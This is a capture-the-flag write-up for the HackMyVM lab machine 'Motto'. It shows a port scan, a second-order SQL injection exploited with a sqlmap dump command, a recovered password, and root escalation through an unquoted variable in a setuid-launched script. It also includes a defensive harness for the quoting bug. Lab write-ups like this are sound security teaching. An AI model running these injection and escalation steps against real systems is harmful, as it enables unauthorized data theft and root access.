Motto


Target machine: https://hackmyvm.eu/machines/machine.php?vm=Motto

Information gathering

10.156.131.124

Port scanning

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.156.131.124                                                       [11:24:53]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.156.131.124:22
Open 10.156.131.124:80
Open 10.156.131.124:9090
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 11:26 CST
Initiating ARP Ping Scan at 11:26
Scanning 10.156.131.124 [1 port]
Completed ARP Ping Scan at 11:26, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:26
Completed Parallel DNS resolution of 1 host. at 11:26, 0.10s elapsed
DNS resolution of 1 IPs took 0.10s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:26
Scanning 10.156.131.124 [3 ports]
Discovered open port 80/tcp on 10.156.131.124
Discovered open port 9090/tcp on 10.156.131.124
Discovered open port 22/tcp on 10.156.131.124
Completed SYN Stealth Scan at 11:26, 0.02s elapsed (3 total ports)
Nmap scan report for 10.156.131.124
Host is up, received arp-response (0.00074s latency).
Scanned at 2026-01-19 11:26:48 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
9090/tcp open zeus-admin syn-ack ttl 64
MAC Address: 08:00:27:74:92:47 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

9090/tcp


Register an account and log in.


There are a great many Mottos, and each Motto is tied to a username.

The /myinfo page lets you change your nickname; try changing it to ll104567.

After the change, opening "My Mottos" shows that the Mottos now listed as mine have changed as well.


This confirms a second-order SQL injection: the nickname is stored first and only injected when it is reused in the later query.

sqlmap

sqlmap -r myinfo.txt --batch --second-url "http://10.156.131.124:9090/mymottos" --dump


This yields user credentials:

redbean:cannotforgetyou

Privilege escalation

find / -perm -4000 -type f 2>/dev/null


The home directory also contains a backup folder, .backup:

redbean@motto:~/.backup$ cd ~/.backup
redbean@motto:~/.backup$ ls
new.sh run_newsh.c
redbean@motto:~/.backup$ cat new.sh
#!/bin/bash
PATH=/usr/bin

echo -e "\033[1;35m"
echo '▓▒░ Loading system diagnostics ░▒▓'
echo -e "\033[0m"

echo -e "\033[1;34m[INFO]\033[0m Initializing environment checks:"
for step in A B C; do
    echo -e "\033[1;33m ● Module ${step} status: OK (ver $(($RANDOM%5+1)).$(($RANDOM%20)).$(($RANDOM%500)))\033[0m"
    sleep 0.12
done

echo "Random seed value: $RANDOM"
echo -e "\033[1;34m[INFO]\033[0m Evaluating input parameters..."
sleep 0.15

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

echo -e "\033[1;34m[INFO]\033[0m Running diagnostic sequence:"
for step in {1..3}; do
    echo -e "\033[1;35m → Executing test ${step} of 3\033[0m"
    sleep 0.2
done

WAIT_TIME=$((RANDOM%5+2))
echo -e "\033[1;36m\nWaiting period: \033[3${WAIT_TIME}m${WAIT_TIME} seconds\033[0m"

for ((i=WAIT_TIME; i>=0; i--)); do
    case $((i%4)) in
        0) COL="34" ;; # blue
        1) COL="32" ;; # green
        2) COL="31" ;; # red
        3) COL="36" ;; # cyan
    esac

    case $((i%2)) in
        0) echo -e "\033[1;${COL}m>> Waiting T-${i} seconds...\033[0m" ;;
        1) echo -e "\033[1;${COL}m>> Countdown: ${i}\033[0m" ;;
    esac

    [ $i -gt 0 ] && sleep 1
done

RESULTS=(
    "Diagnostics complete."
    "All systems nominal."
    "No errors detected."
    "System stable."
)

FINAL_MSG=${RESULTS[$RANDOM % ${#RESULTS[@]}]}
echo -e "\033[1;32m${FINAL_MSG}\033[0m"
echo -e "\033[1;34mThank you for using the system monitor.\033[0m"

echo -e "\033[1;30m[STATS] Summary Report:\033[0m"
echo -e " Processes checked: $((RANDOM%60+20))"
echo -e " CPU load average: $(echo "scale=2; $RANDOM%10+0.5" | bc)"
echo -e " Uptime (hours): $((RANDOM%100+1))"

redbean@motto:~/.backup$ cat run_newsh.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <arg>\n", argv[0]);
        return 1;
    }

    // Switch to root (if running setuid)
    setuid(0);
    setgid(0);

    // Build the argument list and invoke new.sh with the argument
    char *script = "/opt/new.sh";
    char *args[] = { script, argv[1], NULL };

    execv(script, args); // run the script with execv

    perror("execv failed");
    return 1;
}

In new.sh, the lines

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

are the privilege-escalation point: the first two references to $1 are wrapped in double quotes, but the third is not.

The first test checks whether the user supplied any input and exits if not.

The second test checks whether the input equals "flag" and exits if it does.

The third test also checks whether the input equals "flag", and if so gives /bin/bash the +s (setuid) bit.

The problem lies in those missing quotes. If * is passed as the argument, the first two tests see the literal string "*" (non-empty, and not equal to "flag"), but in the third test Bash applies pathname (glob) expansion to the unquoted $1. If the expansion yields "flag", the comparison succeeds, chmod +s runs, and Bash gains the SUID bit.

The purpose of run_newsh.c is to launch the new.sh script above as root.

The compiled counterpart of run_newsh.c is the run_newsh binary under /opt.
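To make the quoting point concrete from a defender's side, here is an added example (not part of the original writeup and not code from the machine) that reproduces the third test of new.sh in a harmless harness, with no chmod and no setuid, and places the hardened comparison beside it. The function names vulnerable_check, hardened_check and run_in_sandbox are hypothetical; the scratch directory with a file named flag mirrors the writeup's aaa directory. It covers both bypasses the writeup shows, the glob "*" and the trailing space in "flag ", since both come from the same missing quotes.

```shell
#!/bin/bash
# Added example: demonstrates why [ $1 = "flag" ] is unsafe and how to fix it.
# Nothing here touches file permissions; the checks only print a verdict.

# Vulnerable comparison, modelled on the third test in new.sh. Because $1 is
# unquoted, the shell applies word splitting ("flag " -> flag) and pathname
# expansion ("*" -> names in the current directory) before [ ever runs.
vulnerable_check() {
    [ -n "$1" ] || { echo "empty"; return 1; }
    [ "$1" = "flag" ] && { echo "literal flag rejected"; return 2; }
    if [ $1 = "flag" ] 2>/dev/null; then   # unquoted on purpose (the bug)
        echo "match"; return 0
    fi
    echo "no match"; return 3
}

# Hardened comparison: every expansion is double-quoted, so the argument is
# compared byte for byte; "*" stays "*" and "flag " keeps its trailing space.
# set -f (noglob) inside a subshell is defence in depth against any later
# unquoted use and does not leak into the caller's shell.
hardened_check() {
    (
        set -f
        [ -n "$1" ] || { echo "empty"; exit 1; }
        [ "$1" = "flag" ] || { echo "no match"; exit 3; }
        echo "match"; exit 0
    )
}

# Run a check function inside a scratch directory that contains exactly one
# file, named "flag", so that an unquoted "*" expands to that single name.
# The verdict is printed by the check; its exit status is passed through.
run_in_sandbox() {
    local fn=$1 arg=$2 dir rc
    dir=$(mktemp -d) || return 99
    touch "$dir/flag"                     # constructed fixture, as in the writeup
    ( cd "$dir" && "$fn" "$arg" ) && rc=0 || rc=$?
    rm -rf "$dir"
    return "$rc"
}

# Side-by-side demonstration for the three interesting inputs.
for arg in '*' 'flag ' 'flag'; do
    printf 'arg=[%s]  vulnerable: %-22s  hardened: %s\n' "$arg" \
        "$(run_in_sandbox vulnerable_check "$arg")" \
        "$(run_in_sandbox hardened_check "$arg")"
done
```

Running it shows the vulnerable check reporting "match" for both "*" and "flag " while rejecting the literal "flag", exactly the inversion the writeup exploits; the hardened check accepts only the exact string. The same lesson applies to the wrapper: a setuid launcher should never hand user-controlled arguments to a shell script without the script quoting every expansion.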

redbean@motto:~$ ls
user.txt
redbean@motto:~$ mkdir aaa
redbean@motto:~$ cd aaa
redbean@motto:~/aaa$ touch flag
redbean@motto:~/aaa$ ls
flag
redbean@motto:~/aaa$ /opt/run_newsh "*"

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
● Module A status: OK (ver 2.4.80)
● Module B status: OK (ver 4.8.168)
● Module C status: OK (ver 5.14.228)
Random seed value: 21063
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
→ Executing test 1 of 3
→ Executing test 2 of 3
→ Executing test 3 of 3

Waiting period: 5 seconds
>> Countdown: 5
>> Waiting T-4 seconds...
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
Diagnostics complete.
Thank you for using the system monitor.
[STATS] Summary Report:
Processes checked: 49
/opt/new.sh: line 60: bc: command not found
CPU load average:
Uptime (hours): 36
redbean@motto:~/aaa$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
redbean@motto:~/aaa$

A trailing space also bypasses the check, because word splitting of the unquoted $1 drops it:

/opt/run_newsh "flag "